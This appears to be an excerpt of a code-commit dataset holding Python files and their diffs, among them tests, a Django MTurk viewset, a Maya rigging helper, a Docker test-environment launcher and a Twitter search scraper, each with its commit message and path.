def test_downsample_onepmf():
# One pmf
d1 = np.array([0, .51, .49])
d2_ = np.array([0, .5, .5])
d2 = module.downsample(d1, 1)
np.testing.assert_allclose(d2, d2_)
def test_downsample_twopmf():
# Two pmf
d1 = np.array([[0, .51, .49], [.6, .3, .1]])
d2_ = np.array([[0, .5, .5], [.5, .5, 0]])
d2 = module.downsample(d1, 1)
np.testing.assert_allclose(d2, d2_)
def test_downsample_badmethod():
d1 = np.array([0, .51, .49])
assert_raises(
NotImplementedError, module.downsample, d1, 3, method='whatever'
)
def test_projections1():
d = np.array([ 0.03231933, 0.89992681, 0.06775385])
d2_ = np.array([
[ 0.03231933, 0.89992681, 0.06775385],
[ 0. , 0.92998325, 0.07001675],
[ 0. , 0.875 , 0.125 ]
])
d2 = module.projections(d, 3)
np.testing.assert_allclose(d2, d2_)
def test_projections2():
d = np.array([ 0.51, 0.48, 0.01])
d2_ = np.array([
[ 0.51 , 0.48 , 0.01 ],
[ 0.5 , 0.48979592, 0.01020408],
[ 0.5 , 0.5 , 0. ]
])
d2 = module.projections(d, 3)
np.testing.assert_allclose(d2, d2_, rtol=1e-7, atol=1e-8)
def test_clamps():
d = np.array([.51, .48, .01])
out_ = (np.array([[4, 3, 0], [5, 4, 1]]),
np.array([ 0., 0.125, 0.25, 0.375, 0.5, 0.625, 0.75, 0.875, 1.]))
out = module.clamped_indexes(d, 3)
np.testing.assert_allclose(out[0], out_[0])
np.testing.assert_allclose(out[1], out_[1], rtol=1e-7, atol=1e-8)
|
Python
| 0
|
@@ -180,16 +180,20 @@
_perturb
+_one
():%0A
@@ -330,16 +330,213 @@
d, d3)%0A%0A
+def test_perturb_many():%0A # Smoke test%0A d = np.array(%5B%5B0, .5, .5%5D, %5B.5, .5, .0%5D%5D)%0A d2 = module.perturb(d, .00001)%0A print(d2)%0A d3 = d2.round(2)%0A np.testing.assert_allclose(d, d3)%0A%0A
def test
|
50eedeaaa401d192c2681d58c83981961a1c4ff1
|
fix update profile
|
lxxl/services/graph/users/profile.py
|
lxxl/services/graph/users/profile.py
|
from lxxl.lib import router, output
from lxxl.lib.app import Controller, Error
from lxxl.lib.storage import Db, ASCENDING
from lxxl.lib.flush import FlushRequest
from lxxl.model.users import User, Factory as UserFactory, Duplicate
import datetime
class Profile(router.Root):
def get(self, environ, params):
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
# fix privacy
# if relation < 1:
# output.error('#ApiKeyUnauthorized', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
#XXX uncomment me ?
# if user.activate == 0:
# output.error('unactivated user', 404)
result = {}
Db().get('profile').ensure_index(
[('uid', ASCENDING)], {'background': True})
profile = Db().get('profile').find_one({'uid': params['uid']})
if not profile:
profile = {}
profile['datas'] = {}
result['profile'] = profile['datas']
result['email'] = user.email
result['username'] = user.username
if user.premium:
result['premium'] = True
if user.hasAvatar is True:
result['hasAvatar'] = True
else:
result['hasAvatar'] = False
result['friends'] = user.friends_count
output.success(result, 200)
except Error:
pass
return Controller().getResponse(True)
def set(self, environ, params):
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
apikey = Controller().getApiKey()
if Controller().getApiType() != 1:
output.error('Not your api business', 403)
# if relation != 2:
# output.error(
# '#ApiKeyUnauthorized : none of your business', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
data = Controller().getPostJson()
if not data:
output.error('bad json format', 400)
Db().get('profile').update({'uid': me}, {
'datas': data,
'uid': me,
'updated': datetime.datetime.utcnow()
}, True)
output.success('profile updated', 200)
except Error:
pass
return Controller().getResponse(True)
|
Python
| 0.000001
|
@@ -2292,18 +2292,22 @@
.get
-PostJ
+Request().j
son
-()
%0A%0A
|
9a4e2f88eba716ef607b8c476509cac5e58475f7
|
Update mapper_lowercase.py
|
mapreduce/filter/mapper_lowercase.py
|
mapreduce/filter/mapper_lowercase.py
|
#!/usr/bin/env python
import sys
# Open just for read
dbpediadb = set(open('dbpedia_labels.txt').read().splitlines())
dbpediadb_lower = set(x.lower() for x in open('dbpedia_labels.txt').read().splitlines())
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# split the line into words
ngram, num = line.split('\t')
if ngram in dbpediadb:
print '%s\t%s|--|%s' % (ngram.lower(), ngram.replace(' ', '_'), num)
if ngram in dbpediadb_lower:
print '%s\t%s|--|%s' % (ngram.lower(), 'lower', num)
|
Python
| 0.000067
|
@@ -470,32 +470,40 @@
um)%0A if ngram
+.lower()
in dbpediadb_lo
|
84ce27775b7e04955a15a0eb1e277db3e447b81f
|
fix SlidingCloth
|
mayaLib/rigLib/utils/slidingCloth.py
|
mayaLib/rigLib/utils/slidingCloth.py
|
__author__ = 'Lorenzo Argentieri'
import pymel.core as pm
from mayaLib.rigLib.utils import skin
from mayaLib.rigLib.utils import deform
class SlidingCloth():
def __init__(self, mainSkinGeo, proxySkinGeo, mainClothGeo, proxyClothGeo):
"""
Setup Sliding Cloth deformation
:param mainSkinGeo: str
:param proxySkinGeo: str
:param mainClothGeo: str
:param proxyClothGeo: str
"""
if mainSkinGeo and mainClothGeo:
self.mainSkinGeo = pm.ls(mainSkinGeo)[0]
self.mainClothGeo = pm.ls(mainClothGeo)[0]
else:
print 'No valid Geo!'
if proxySkinGeo:
self.proxySkinGeo = pm.ls(proxySkinGeo)[0]
else:
print 'Make Skin proxy Geo!'
if proxyClothGeo:
self.proxyClothGeo = pm.ls(proxyClothGeo)[0]
else:
print 'Make Cloth proxy GEO!'
# setup skin proxy geo
skin.copyBind(self.mainSkinGeo, self.proxySkinGeo)
# setup cloth proxy geo
skin.copyBind(self.mainSkinGeo, self.proxyClothGeo)
cMuscleDeformer = deform.cMuscleSystemDeformer(self.proxyClothGeo)
cMuscleDeformer.enableRelax.set(1)
cMuscleDeformer.relaxCompress.set(10)
cMuscleDeformer.enableSmooth.set(1)
shrinkWrapDeformer = deform.shrinkWrapDeformer(self.proxyClothGeo, self.proxySkinGeo)
shrinkWrapDeformer.shapePreservationEnable.set(1)
polySmoothDeformer = pm.polySmooth(self.proxyClothGeo)[0]
# wrap main Cloth Geo
wrapDeformer = deform.wrapDeformer(self.mainClothGeo, self.proxyClothGeo)
|
Python
| 0.000001
|
@@ -231,16 +231,34 @@
ClothGeo
+, rigModelGrp=None
):%0A
@@ -1626,28 +1626,290 @@
lothGeo, self.proxyClothGeo)
+%0A baseObj = pm.listConnections(wrapDeformer.basePoints, source=True)%5B0%5D%0A if rigModelGrp:%0A pm.parent(baseObj, rigModelGrp)%0A%0A # save attribute%0A self.baseObj = baseObj%0A%0A def getWrapBaseObj(self):%0A return self.baseObj
|
b99c839eac306ccd4e73a53bc45bef3be46f99a8
|
clean up amend data
|
meerkat_nest/resources/amend_data.py
|
meerkat_nest/resources/amend_data.py
|
"""
Data resource for upload data
"""
from flask_restful import Resource
from flask import request
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import json
import os
import uuid
import datetime
from pprint import pprint
from meerkat_nest import model
from meerkat_nest import config
from meerkat_nest.util import scramble, format_form_field_key, validate_request, raw_odk_data_to_dict
from meerkat_nest import message_service
db_url = os.environ['MEERKAT_NEST_DB_URL']
engine = create_engine(db_url)
class amendData(Resource):
"""
Receives JSON data and amends an existing entry in Meerkat DB
Returns:\n
HTTP return code\n
"""
#decorators = [authenticate]
def get(self):
return "amend data GET"
def post(self):
logging.info("received amend request")
logging.info(str(request.headers))
data_entry = request.get_json()
logging.info(str(data_entry))
try:
validate_request(data_entry)
except AssertionError as e:
logging.error("Input was not a valid Meerkat Nest JSON object: " + e.args[0])
return Response(json.dumps({"message":("Input was not a valid Meerkat Nest JSON object: " + e.args[0])}),
status=400,
mimetype='application/json')
try:
new_row = amend_raw_data(data_entry)
except AssertionError as e:
logging.error("No record with uuid " + data_entry['uuid'] + " found")
return Response(json.dumps({"message":"No record with uuid " + data_entry['uuid'] + " found"}),
status=400,
mimetype='application/json')
except Exception as e:
logging.error("Error in uploading data: " + e.args[0])
return Response(json.dumps({"message": "Error in uploading data: " + e.args[0]}),
status=502,
mimetype='application/json')
try:
processed_data_entry = process(data_entry)
except AssertionError as e:
logging.error("Data type '" + data_entry['formId'] + "' is not supported for input type '" + data_entry['content'] + "'")
return Response(json.dumps({"message":"Data type '" + data_entry['formId'] + "' is not supported for input type '" + data_entry['content'] + "'"}),
status=400,
mimetype='application/json')
try:
sent = message_service.send_data(processed_data_entry)
except AssertionError as e:
logging.error("Error in forwarding data to message queue: " + str(e))
return Response(json.dumps({"message":"Error in forwarding data to message queue: " + str(e)}),
status=502,
mimetype='application/json')
logging.warning("processed amend request")
return processed_data_entry
def amend_raw_data(data_entry):
"""
Amends raw data in Meerkat Nest database
Returns:\n
uuid for the PK of the raw data row\n
"""
assert(data_entry['content'] in ['form'])
if data_entry['content'] == 'form':
Session = sessionmaker(bind=engine)
session = Session()
old_row_query = session.query(model.rawDataOdkCollect)\
.filter(model.rawDataOdkCollect.uuid == data_entry['uuid']).all()
assert len(old_row_query) == 1, "No record with uuid " + data_entry['uuid'] + " found"
old_row = old_row_query[0]
new_uuid = str(uuid.uuid4())
timestamp_now = datetime.datetime.now()
archived_row = model.rawDataOdkCollectArchive(
uuid = data_entry['uuid'],
active_uuid = new_uuid,
received_on = old_row.received_on,
active_from = old_row.active_from,
active_until = timestamp_now,
authentication_token = old_row.authentication_token,
content = old_row.content,
formId = old_row.formId,
formVersion = old_row.formVersion,
data = old_row.data
)
new_row = model.rawDataOdkCollect(
uuid = new_uuid,
received_on = old_row.received_on,
active_from = timestamp_now,
authentication_token = data_entry['token'],
content = data_entry['content'],
formId = data_entry['formId'],
formVersion = data_entry['formVersion'],
data = data_entry['data']
)
try:
session.add(archived_row)
session.delete(old_row)
session.add(new_row)
session.commit()
session.flush()
except Exception as e:
raise
return new_row
|
Python
| 0.000019
|
@@ -91,16 +91,26 @@
request
+, Response
%0Afrom sq
@@ -233,33 +233,22 @@
ime%0A
-from pprint
import
-pprint
+logging
%0A%0Afr
@@ -2818,36 +2818,68 @@
-status=502,%0A
+ status=502,%0A
@@ -3008,16 +3008,17 @@
_entry%0A%0A
+%0A
def amen
@@ -3264,23 +3264,29 @@
-S
+s
ession
+_maker
= sessi
@@ -3328,15 +3328,21 @@
n =
-S
+s
ession
+_maker
()%0A
@@ -3380,25 +3380,25 @@
query(model.
-r
+R
awDataOdkCol
@@ -3426,25 +3426,25 @@
ilter(model.
-r
+R
awDataOdkCol
@@ -3723,33 +3723,33 @@
ved_row = model.
-r
+R
awDataOdkCollect
@@ -3752,15 +3752,8 @@
lect
-Archive
(%0A
@@ -3770,29 +3770,21 @@
uuid
- = data_entry%5B'
+=old_row.
uuid
-'%5D
,%0A
@@ -3800,27 +3800,25 @@
active_uuid
- =
+=
new_uuid,%0A
@@ -3830,35 +3830,33 @@
received_on
- =
+=
old_row.received
@@ -3883,19 +3883,17 @@
ive_from
- =
+=
old_row.
@@ -3929,19 +3929,17 @@
ve_until
- =
+=
timestam
@@ -3977,19 +3977,17 @@
on_token
- =
+=
old_row.
@@ -4027,19 +4027,17 @@
content
- =
+=
old_row.
@@ -4063,19 +4063,17 @@
formId
- =
+=
old_row.
@@ -4103,19 +4103,17 @@
mVersion
- =
+=
old_row.
@@ -4141,19 +4141,17 @@
data
- =
+=
old_row.
@@ -4190,17 +4190,17 @@
= model.
-r
+R
awDataOd
|
990330ce9bf3cb9cc63d1287f49f04f1a7fe2cf0
|
fix mocked_app parameter not being optional
|
docker/environment/appmock.py
|
docker/environment/appmock.py
|
# coding=utf-8
"""Authors: Łukasz Opioła, Konrad Zemek
Copyright (C) 2015 ACK CYFRONET AGH
This software is released under the MIT license cited in 'LICENSE.txt'
Brings up a set of appmock instances.
"""
import copy
import json
import os
import random
import string
from . import common, docker, dns, provider_ccm, provider_worker, globalregistry
APPMOCK_WAIT_FOR_NAGIOS_SECONDS = 60 * 2
def domain(appmock_instance, uid):
"""Formats domain for an appmock instance.
It is intended to fake OP or GR domain.
"""
return common.format_hostname(appmock_instance, uid)
def appmock_hostname(node_name, uid):
"""Formats hostname for a docker hosting appmock.
NOTE: Hostnames are also used as docker names!
"""
return common.format_hostname(node_name, uid)
def appmock_erl_node_name(node_name, uid):
"""Formats erlang node name for a vm on appmock docker.
"""
hostname = appmock_hostname(node_name, uid)
return common.format_erl_node_name('appmock', hostname)
def _tweak_config(config, appmock_node, appmock_instance, uid):
cfg = copy.deepcopy(config)
cfg['nodes'] = {'node': cfg['nodes'][appmock_node]}
mocked_app = 'none'
if 'mocked_app' in cfg['nodes']['node']:
mocked_app = cfg['nodes']['node']['mocked_app']
# Node name depends on mocked app, if none is specified,
# default appmock_erl_node_name will be used.
node_name = {
'op_ccm': provider_ccm.ccm_erl_node_name(appmock_node,
appmock_instance, uid),
'op_worker': provider_worker.worker_erl_node_name(appmock_node,
appmock_instance,
uid),
'globalregistry': globalregistry.gr_erl_node_name(appmock_node,
appmock_instance, uid)
}.get(mocked_app, appmock_erl_node_name(appmock_node, uid))
if 'vm.args' not in cfg['nodes']['node']:
cfg['nodes']['node']['vm.args'] = {}
vm_args = cfg['nodes']['node']['vm.args']
vm_args['name'] = node_name
# If cookie is not specified, set random cookie
# so the node does not try to connect to others
if 'setcookie' not in vm_args:
vm_args['setcookie'] = ''.join(
random.sample(string.ascii_letters + string.digits, 16))
return cfg
def _node_up(image, bindir, config, config_path, dns_servers, logdir):
node_name = config['nodes']['node']['vm.args']['name']
(name, sep, hostname) = node_name.partition('@')
sys_config = config['nodes']['node']['sys.config']
# can be an absolute path or relative to gen_dev_args.json
app_desc_file_path = sys_config['app_description_file']
app_desc_file_name = os.path.basename(app_desc_file_path)
app_desc_file_path = os.path.join(common.get_file_dir(config_path),
app_desc_file_path)
# file_name must be preserved as it must match the Erlang module name
sys_config['app_description_file'] = '/tmp/' + app_desc_file_name
command = '''set -e
cat <<"EOF" > /tmp/{app_desc_file_name}
{app_desc_file}
EOF
cat <<"EOF" > /tmp/gen_dev_args.json
{gen_dev_args}
EOF
escript bamboos/gen_dev/gen_dev.escript /tmp/gen_dev_args.json
/root/bin/node/bin/appmock console'''
command = command.format(
app_desc_file_name=app_desc_file_name,
app_desc_file=open(app_desc_file_path, 'r').read(),
gen_dev_args=json.dumps({'appmock': config}))
volumes = [(bindir, '/root/build', 'ro')]
if logdir:
logdir = os.path.join(os.path.abspath(logdir), hostname)
volumes.extend([(logdir, '/root/bin/node/log', 'rw')])
container = docker.run(
image=image,
name=hostname,
hostname=hostname,
detach=True,
interactive=True,
tty=True,
workdir='/root/build',
volumes=volumes,
dns_list=dns_servers,
command=command)
return container, {
'docker_ids': [container],
'appmock_nodes': [node_name]
}
def _ready(node):
node_ip = docker.inspect(node)['NetworkSettings']['IPAddress']
return common.nagios_up(node_ip, '9999')
def up(image, bindir, dns_server, uid, config_path, logdir=None):
config = common.parse_json_file(config_path)
input_dir = config['dirs_config']['appmock']['input_dir']
dns_servers, output = dns.maybe_start(dns_server, uid)
for appmock_instance in config['appmock_domains']:
gen_dev_cfg = {
'config': {
'input_dir': input_dir,
'target_dir': '/root/bin'
},
'nodes': config['appmock_domains'][appmock_instance]['appmock']
}
tweaked_configs = [_tweak_config(gen_dev_cfg, appmock_node,
appmock_instance, uid)
for appmock_node in gen_dev_cfg['nodes']]
include_domain = False
appmock_ips = []
appmocks = []
for cfg in tweaked_configs:
appmock_id, node_out = _node_up(image, bindir, cfg,
config_path, dns_servers, logdir)
appmocks.append(appmock_id)
mocked_app = cfg['nodes']['node']['mocked_app']
if mocked_app == 'op_worker' or mocked_app == 'globalregistry':
include_domain = True
appmock_ips.append(common.get_docker_ip(appmock_id))
common.merge(output, node_out)
common.wait_until(_ready, appmocks, APPMOCK_WAIT_FOR_NAGIOS_SECONDS)
if include_domain:
domains = {
'domains': {
domain(appmock_instance, uid): {
'ns': [],
'a': appmock_ips
}
}
}
common.merge(output, domains)
# Make sure domain are added to the dns server
dns.maybe_restart_with_configuration(dns_server, uid, output)
return output
|
Python
| 0.000002
|
@@ -5266,24 +5266,81 @@
appmock_id)%0A
+ if 'mocked_app' in cfg%5B'nodes'%5D%5B'node'%5D:%0A
@@ -5387,16 +5387,20 @@
d_app'%5D%0A
+
@@ -5475,32 +5475,36 @@
+
include_domain =
@@ -5509,16 +5509,20 @@
= True%0A
+
|
7102a79cae2fc60c9747b5ee1285544fc290d3a3
|
Add URL to 404 error message
|
twitterscraper/TwitterScraper.py
|
twitterscraper/TwitterScraper.py
|
from bs4 import BeautifulSoup
import json
import csv
import logging
import urllib
import random
import time
from fake_useragent import UserAgent
ua = UserAgent()
headers_list = [ua.chrome, ua.google, ua['google chrome'], ua.firefox, ua.ff]
class Scraper:
def __init__(self,
topics,
no_tweets=float('inf'),
lang='',
begin_date='',
end_date='',
authors='',
recipients='',
near='',
within=1,
filename=''):
self.topics = self.parse_topics(topics)
self.no_tweets = no_tweets
self.lang = lang
self.begin_date = begin_date
self.end_date = end_date
self.authors = self.parse_authors(authors)
self.recipients = self.parse_recipients(recipients)
self.filename = filename
self.first_tweet_id = 0
self.last_tweet_id = 0
self.collected_tweets = 0
self.location = self.parse_location(near, within)
self.min_position = -1
if self.filename:
self.writer = csv.writer(open(self.filename, 'wb'), delimiter="\t")
def parse_topics(*topics):
if type(topics[1]) is str:
topics_string = topics[1]
elif type(topics[1]) is list:
topics_string = ' '.join(topics[1])
topics_string = topics_string.replace(' ', '%20')
return topics_string
def parse_authors(*authors):
if authors[1]:
if type(authors[1]) is str:
authors_string = authors[1]
elif type(authors[1]) is list:
authors_string = "%20OR%20from%3A".join(authors[1])
return authors_string
def parse_recipients(*recipients):
if recipients[1]:
if type(recipients[1]) is str:
recipients_string = recipients[1]
elif type(recipients[1]) is list:
recipients_string = "%20OR%20to%3A".join(recipients[1])
return recipients_string
def parse_location(self, location, within):
if location:
if type(location) is str:
location_string = 'near%3A"' + location + '"%20within%3A' + within
elif type(location) is list:
location_string = '"geocode%3A' + \
str(location[0]) + '%2C' + \
str(location[1]) + '%2C' + within
return location_string
def is_first_iteration(self):
return True if self.min_position == -1 else False
def continue_scraping(self, tweets):
if (self.collected_tweets < self.no_tweets) and len(tweets) > 0:
return True
else:
return False
def parse_url(self):
url_1 = "https://twitter.com/search?f=tweets&vertical=default&q="
url_2 = "https://twitter.com/i/search/timeline?f=tweets&vertical=default&include_available_features=1&include_entities=1&reset_error_state=false&src=typd"
if self.is_first_iteration():
url = url_1 + self.topics
else:
url = url_2 + \
"&max_position=%s&q=%s" % (self.min_position, self.topics)
if self.lang:
url += "%20lang%3A" + self.lang
if self.begin_date:
url += "%20since%3A" + self.begin_date
if self.end_date:
url += "%20until%3A" + self.end_date
if self.authors:
url += "%20from%3A" + self.authors
if self.recipients:
url += "%20to%3A" + self.recipients
if self.location:
url += '%20' + self.location
return url
def scrape_tweets(self):
url = self.parse_url()
headers = {'User-Agent': random.choice(headers_list)}
req = urllib.request.Request(url, headers=headers)
tweets = []
try:
response = urllib.request.urlopen(req).read().decode()
if self.is_first_iteration():
html = response
else:
response_json = json.loads(response)
html = response_json['items_html']
soup = BeautifulSoup(html, "lxml")
tweets = soup.find_all('li', 'js-stream-item')
if tweets:
self.last_tweet_id = tweets[-1]['data-item-id']
self.first_tweet_id = tweets[0]['data-item-id']
if self.is_first_iteration():
self.min_position = "TWEET-%s-%s" % (self.last_tweet_id,
self.first_tweet_id)
else:
minp_splitted = response_json['min_position'].split('-')
minp_splitted[1] = self.last_tweet_id
self.min_position = "-".join(minp_splitted)
except urllib.request.HTTPError as e:
logging.error('HTTPError = ' + str(e.code))
time.sleep(1)
except urllib.error.URLError as e:
logging.error('URLError = ' + str(e.reason))
time.sleep(1)
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
time.sleep(1)
return tweets
def extract_data_from_tweet(self, tweet):
tweet_user = tweet.find('span', 'username').text
tweet_fullname = tweet.find('strong', 'fullname').text.encode('utf8')
tweet_text = tweet.find('p', 'tweet-text')
if tweet_text:
tweet_text = tweet_text.text.encode('utf8')
tweet_id = tweet['data-item-id']
timestamp = tweet.find('a', 'tweet-timestamp')['title']
return [tweet_user, tweet_id, timestamp, tweet_fullname, tweet_text]
def write(self, post):
if self.filename:
self.writer.writerow(post)
else:
print(post)
def scrape(self):
tweets = [-1]
print("collecting %s number of Tweets on the topics: %s" % (
self.no_tweets, self.topics))
while self.continue_scraping(tweets):
tweets = self.scrape_tweets()
for tweet in tweets:
self.collected_tweets += 1
post = self.extract_data_from_tweet(tweet)
self.write(post)
|
Python
| 0.000001
|
@@ -4915,24 +4915,69 @@
ror
-= ' + str(
+%7B%7D while requesting %22%7B%7D%22'.format(%0A
e.code
+, url
))%0A
|
f7060b65464b24bb16a8cf4704c68fa1348d655c
|
bump version
|
crossbar/crossbar/__init__.py
|
crossbar/crossbar/__init__.py
|
###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU Affero General Public License, version 3,
## as published by the Free Software Foundation.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Affero General Public License for more details.
##
## You should have received a copy of the GNU Affero General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
##
###############################################################################
__doc__ = """
Crossbar.io - Polyglot application router.
For more information, please visit:
* Documentation: https://github.com/crossbario/crossbar/wiki
* Homepage: http://crossbar.io/
* Source code: https://github.com/crossbario/crossbar
Open-source licensed under the GNU Affero General Public License version 3.
Created by Tavendo GmbH. Get in contact at http://tavendo.com
"""
__version__ = "0.9.4-2"
|
Python
| 0
|
@@ -1226,11 +1226,11 @@
%220.9.4-
-2
+3
%22%0A
|
1eb8bfbe2f35393b23d621e2ccc1337f13a27730
|
fix filter first
|
mturk/viewsets.py
|
mturk/viewsets.py
|
from rest_framework.viewsets import GenericViewSet
from rest_framework import mixins
from rest_framework.decorators import detail_route, list_route
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404
from rest_framework.response import Response
from rest_framework import status
from hashids import Hashids
from django.db import transaction
from mturk.models import MTurkHIT, MTurkAssignment, MTurkNotification
from crowdsourcing.models import TaskWorker, TaskWorkerResult
from crowdsourcing.serializers.task import TaskSerializer, TaskWorkerResultSerializer
from mturk.interface import MTurkProvider
from mturk.permissions import IsValidHITAssignment
from mturk.utils import get_or_create_worker
from csp import settings
class MTurkAssignmentViewSet(mixins.CreateModelMixin, GenericViewSet):
queryset = MTurkAssignment.objects.all()
serializer_class = TaskSerializer
def create(self, request, *args, **kwargs):
worker = get_or_create_worker(worker_id=request.data.get('workerId'))
provider = MTurkProvider('https://' + request.get_host())
task_id = request.data.get('taskId', -1)
task_hash = Hashids(salt=settings.SECRET_KEY, min_length=settings.MTURK_HASH_MIN_LENGTH)
task_id = task_hash.decode(task_id)
if len(task_id) == 0:
task_id = -1
hit_id = request.data.get('hitId', -1)
mturk_hit = get_object_or_404(MTurkHIT, task_id=task_id, hit_id=hit_id)
assignment_id = request.data.get('assignmentId', -1)
mturk_assignment_id = None
if assignment_id != 'ASSIGNMENT_ID_NOT_AVAILABLE':
assignment, is_valid = provider.get_assignment(assignment_id)
if not assignment or (is_valid and assignment.HITId != hit_id):
return Response(data={"message": "Invalid assignment"}, status=status.HTTP_400_BAD_REQUEST)
task_worker, created = TaskWorker.objects.get_or_create(worker=worker, task_id=task_id[0])
if created:
task_worker.task_status=TaskWorker.STATUS_IN_PROGRESS
task_worker.save()
assignment, created = MTurkAssignment.objects.get_or_create(hit=mturk_hit,
assignment_id=assignment_id,
task_worker=task_worker)
mturk_assignment_id = assignment.id
if created:
assignment.status = TaskWorker.STATUS_IN_PROGRESS
assignment.save()
task_serializer = TaskSerializer(instance=mturk_hit.task,
fields=('id', 'template', 'project_data', 'status'))
response_data = {
'task': task_serializer.data,
'assignment': mturk_assignment_id
}
return Response(data=response_data, status=status.HTTP_200_OK)
@detail_route(methods=['post'], permission_classes=[IsValidHITAssignment], url_path='submit-results')
def submit_results(self, request, *args, **kwargs):
mturk_assignment = self.get_object()
template_items = request.data.get('template_items', [])
with transaction.atomic():
task_worker_results = TaskWorkerResult.objects.filter(task_worker_id=mturk_assignment.task_worker.id)
serializer = TaskWorkerResultSerializer(data=template_items, many=True)
if serializer.is_valid():
if task_worker_results.count() != 0:
serializer.update(task_worker_results, serializer.validated_data)
else:
serializer.create(task_worker=mturk_assignment.task_worker)
return Response(data={'message': 'Success'}, status=status.HTTP_200_OK)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
@list_route(methods=['post', 'get'], url_path='notification')
def notification(self, request, *args, **kwargs):
hit_id = request.query_params.get('Event.1.HITId')
assignment_id = request.query_params.get('Event.1.AssignmentId')
event_type = request.query_params.get('Event.1.EventType')
mturk_assignment = MTurkAssignment.objects.filter(hit__hit_id=hit_id, assignment_id=assignment_id)
if event_type in ['AssignmentReturned', 'AssignmentAbandoned']:
mturk_assignment.status = TaskWorker.STATUS_SKIPPED
mturk_assignment.task_worker.task_status = TaskWorker.STATUS_SKIPPED
mturk_assignment.save()
MTurkNotification.objects.create(data=request.query_params)
return Response(data={}, status=status.HTTP_200_OK)
|
Python
| 0
|
@@ -3708,32 +3708,171 @@
nt.task_worker)%0A
+ mturk_assignment.task_worker.task_status = TaskWorker.STATUS_SUBMITTED%0A mturk_assignment.task_worker.save()%0A
@@ -4459,32 +4459,40 @@
d=assignment_id)
+.first()
%0A if even
|
d6348555f6abd88d0e2cd4ceb0993f89032659ee
|
move to new format of response:Dict, rather than list of tuples
|
TestAPI.py
|
TestAPI.py
|
import requests
import nose
_HOST_UNDER_TEST = ""
def setup_module():
f = open('test_url.cfg', 'r')
global _HOST_UNDER_TEST
_HOST_UNDER_TEST = f.readline().strip()
f.close()
class TestPremium:
def test_region1_age40(self):
payload = {'lat': '39.68', 'long': '-122.48', 'age': 40}
r = requests.get(_HOST_UNDER_TEST + '/premium', params=payload)
# check r.status_code
result = r.json()
assert result[1][0] == 'CA_KFHP_005'
nose.tools.assert_almost_equal(result[1][1], 258.58, places=2)
assert len(result) == 5, 'Got %r results' % len(result)
def test_all_params(self):
payload = {'lat': '39.68', 'long': '-122.48', 'age': '25', 'limit':'3'}
r = requests.get(_HOST_UNDER_TEST + '/premium', params=payload)
# check r.status_code
result = r.json()
assert result[0][0] == 'CA_KFHP_015'
nose.tools.assert_almost_equal(result[0][1], 202.17, places=2)
assert len(result) == 3, '%r returned' % result
def test__no_age(self):
payload = {'lat': '39.68', 'long': '-122.48', 'limit':'3'}
r = requests.get(_HOST_UNDER_TEST + '/premium', params=payload)
# check r.status_code
result = r.json()
assert result['message'] == 'Age is required'
def test_no_limit(self):
payload = {'lat': '39.68', 'long': '-122.48', 'age': '25'}
r = requests.get(_HOST_UNDER_TEST + '/premium', params=payload)
# check r.status_code
result = r.json()
assert len(result) == 5, '%r returned' % result
class TestState:
def test_Artois_CA(self):
#http://tools.wmflabs.org/geohack/geohack.php?pagename=Artois%2C_California¶ms=39_37_11_N_122_11_38_W_region:US_type:city
payload = {'lat': '39.619722', 'long':'-122.193889'}
r = requests.get(_HOST_UNDER_TEST + '/state', params=payload)
# check r.status_code
result = r.json()
assert result['state'] == 'CA'
assert result['county'] == 'GLENN', 'county returned is %r' % result['county']
def test_lat39_long122(self):
payload = {'lat': '39', 'long': '-122'}
r = requests.get(_HOST_UNDER_TEST + '/state', params=payload)
# check r.status_code
result = r.json()
assert result['state'] == 'CA'
assert result['county'] == 'COLUSA', 'county returned is %r' % result['county']
def test_TXStateCapitol(self):
payload = {'lat': '30.274635', 'long': '-97.74039'}
r = requests.get(_HOST_UNDER_TEST + '/state', params=payload)
# check r.status_code
result = r.json()
# returning CA/Butte for all locations outside of california right now
assert result['state'] == 'CA'
assert result['county'] == 'BUTTE', 'county returned is %r' % result['county']
class TestRegion:
def test_CA_butte(self):
payload = {'state': 'CA', 'county': 'BUTTE'}
r = requests.get(_HOST_UNDER_TEST + '/region', params=payload)
# check r.status_code
result = r.json()
assert result == 1, 'region returned is %r' % result
def test_CA_napa(self):
payload = {'state': 'ca', 'county': 'napa'}
r = requests.get(_HOST_UNDER_TEST + '/region', params=payload)
# check r.status_code
result = r.json()
assert result == 2, 'region returned is %r' % result
def test_TX_travis(self):
payload = {'state': 'TX', 'county': 'Travis'}
r = requests.get(_HOST_UNDER_TEST + '/region', params=payload)
# check r.status_code
result = r.json()
assert result['message'] == "County Travis doesn't have a matching health region", \
'region returned is %r' % result
|
Python
| 0.000011
|
@@ -1,12 +1,126 @@
+# imports for managing json parsing%0Afrom collections import OrderedDict%0Afrom decimal import Decimal%0Aimport json%0A%0A%0A
import reque
@@ -535,32 +535,170 @@
result =
-r.json()
+json.loads(r.content, object_pairs_hook=OrderedDict, parse_float=Decimal)%0A assert result.keys()%5B1%5D == 'CA_KFHP_005', '%25r returned' %25 result
%0A ass
@@ -686,32 +686,33 @@
result%0A
+#
assert result%5B1%5D
@@ -731,16 +731,40 @@
FHP_005'
+, '%25r returned' %25 result
%0A
@@ -756,32 +756,125 @@
result%0A
+nose.tools.assert_almost_equal(result%5Bresult.keys()%5B1%5D%5D, Decimal(258.58), places=2)%0A #
nose.tools.asser
@@ -950,17 +950,17 @@
ult) ==
-5
+8
, 'Got %25
@@ -1198,17 +1198,24 @@
us_code%0A
-%09
+
result =
@@ -1219,63 +1219,279 @@
t =
-r.json()%0A%09assert result%5B0%5D%5B0%5D == 'CA_KFHP_015'%0A
